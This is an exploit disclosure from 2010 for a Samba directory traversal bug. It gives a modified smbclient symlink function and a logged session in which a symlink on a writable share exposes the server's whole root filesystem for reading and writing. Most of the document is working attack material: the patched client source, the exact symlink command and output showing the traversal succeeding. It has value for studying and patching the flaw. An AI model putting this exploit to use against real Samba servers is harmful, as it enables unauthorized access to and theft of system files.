Samba Remote Directory Traversal

`Samba Remote Directory Traversal  
logic fuckup discovered & exploited by Kingcope in 2010  
  
It seems there was a quite similar bug found back in 2004:  
http://marc.info/?l=bugtraq&m=109658688505723&w=2  
  
A remote attacker can read, list and retrieve nearly all files on the System remotely.  
Required is a valid samba account for a share which is writeable OR  
a writeable share which is configured to be a guest account share,  
in this case this is a preauth exploit.  
  
The attacker can write for example into /tmp or where the account  
he is connecting with has access to (/home/<user> etc).  
  
Exploit session (using the patched smbclient exploit):  
  
smb is a samba user created.  
  
root@nr-pentest:~/Downloads/samba-3.4.5/source3# /usr/local/samba/bin/smbclient -s /etc/samba/smb.conf -Usmb //<host>/testmount/  
Enter smb's password:   
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.4.0]  
smb: \> ls  
. D 0 Wed Feb 3 14:27:03 2010  
.. D 0 Wed Feb 3 14:19:13 2010  
test D 0 Wed Feb 3 14:19:13 2010  
xxx A 1955 Wed Feb 3 14:22:42 2010  
  
45503 blocks of size 2097152. 24437 blocks available  
smb: \> symlink ../../../../../ foobar  
smb: \> ls  
. D 0 Wed Feb 3 14:27:47 2010  
.. D 0 Wed Feb 3 14:19:13 2010  
xxx A 1955 Wed Feb 3 14:22:42 2010  
foobar D 0 Mon Feb 1 20:29:12 2010  
  
45503 blocks of size 2097152. 24437 blocks available  
smb: \> ls ..  
NT_STATUS_OBJECT_PATH_SYNTAX_BAD listing \..  
  
45503 blocks of size 2097152. 24437 blocks available  
smb: \> cd foobar  
smb: \foobar\> ls  
. D 0 Mon Feb 1 20:29:12 2010  
.. D 0 Mon Feb 1 20:29:12 2010  
initrd.img.old 7646184 Mon Jan 18 13:15:48 2010  
boot.ini 18832 Mon Feb 1 20:29:12 2010  
home D 0 Mon Jan 18 13:08:24 2010  
initrd.img 8007195 Thu Jan 21 21:51:26 2010  
.cache DH 0 Sat Jan 23 14:19:08 2010  
opt D 0 Sat Jan 30 11:39:59 2010  
lib D 0 Thu Jan 21 21:13:01 2010  
usr D 0 Sun Jan 31 22:08:11 2010  
.libs DH 0 Thu Jan 21 12:30:48 2010  
var D 0 Sun Jan 31 21:14:42 2010  
bin D 0 Mon Jan 18 13:31:14 2010  
selinux D 0 Tue Oct 20 01:05:22 2009  
root D 0 Tue Feb 2 19:43:59 2010  
vmlinuz.old 3890400 Fri Oct 16 20:03:49 2009  
vmlinuz 3890560 Thu Dec 10 20:33:26 2009  
etc D 0 Wed Feb 3 14:17:29 2010  
srv D 0 Sat Jan 23 20:17:29 2010  
proc DR 0 Wed Feb 3 14:10:41 2010  
dev D 0 Wed Feb 3 14:11:02 2010  
boot D 0 Thu Jan 21 21:51:26 2010  
mnt D 0 Sat Jan 23 19:26:23 2010  
media D 0 Fri Jan 29 08:32:31 2010  
cdrom D 0 Mon Jan 18 12:40:11 2010  
tmp D 0 Wed Feb 3 14:26:20 2010  
sbin D 0 Thu Jan 21 21:50:58 2010  
lost+found D 0 Mon Jan 18 12:39:57 2010  
sys D 0 Wed Feb 3 14:10:41 2010  
  
45503 blocks of size 2097152. 24437 blocks available  
smb: \foobar\>   
  
put and get works in the folder now!  
  
list open shares, this is normal operation mode not an exploit:  
  
root@nr-pentest:~/Downloads/samba-3.4.5/source3/client# /usr/local/samba/bin/smbclient -s /etc/samba/smb.conf -L //<host>/  
Enter root's password:   
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.4.0]  
  
Sharename Type Comment  
--------- ---- -------  
testmount Disk // < this share is writable and exploitable!!  
print$ Disk Printer Drivers  
IPC$ IPC IPC Service (nr-pentest server (Samba, Ubuntu))  
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.4.0]  
  
Server Comment  
--------- -------  
NR-PENTEST nr-pentest server (Samba, Ubuntu)  
  
Workgroup Master  
--------- -------  
WORKGROUP NR-PENTEST  
  
  
smbclient patch (exploit):  
  
samba-3.4.5/source3/client/client.c  
/****************************************************************************  
UNIX symlink.  
****************************************************************************/  
  
static int cmd_symlink(void)  
{  
TALLOC_CTX *ctx = talloc_tos();  
char *oldname = NULL;  
char *newname = NULL;  
char *buf = NULL;  
char *buf2 = NULL;  
char *targetname = NULL;  
struct cli_state *targetcli;  
  
if (!next_token_talloc(ctx, &cmd_ptr,&buf,NULL) ||  
!next_token_talloc(ctx, &cmd_ptr,&buf2,NULL)) {  
d_printf("symlink <oldname> <newname>\n");  
return 1;  
}  
oldname = talloc_asprintf(ctx,   
"%s", // << HERE modified  
buf);   
if (!oldname) {  
return 1;  
}  
newname = talloc_asprintf(ctx,  
"%s", // << HERE modified  
buf2);  
if (!newname) {  
return 1;  
}  
/* ORIGINAL SMBCLIENT SOURCE LINES TO BE MODIFIED (SEE ABOVE).  
oldname = talloc_asprintf(ctx,  
"%s%s", // < modified (see above)  
client_get_cur_dir(), // < removed (see above)  
buf);  
if (!oldname) {  
return 1;  
}  
newname = talloc_asprintf(ctx,  
"%s%s", // < modified (see above)  
client_get_cur_dir(), // < removed (see above)  
buf2);  
if (!newname) {  
return 1;  
}  
----------------------------------------------*/  
  
if (!cli_resolve_path(ctx, "", auth_info, cli, oldname, &targetcli, &targetname)) {  
d_printf("link %s: %s\n", oldname, cli_errstr(cli));  
return 1;  
  
}  
  
if (!SERVER_HAS_UNIX_CIFS(targetcli)) {  
d_printf("Server doesn't support UNIX CIFS calls.\n");  
return 1;  
}  
  
if (!cli_unix_symlink(targetcli, targetname, newname)) {  
d_printf("%s symlinking files (%s -> %s)\n",  
cli_errstr(targetcli), newname, targetname);  
return 1;  
}  
  
return 0;  
}  
  
  
// Cheers,  
// kcope  
  
`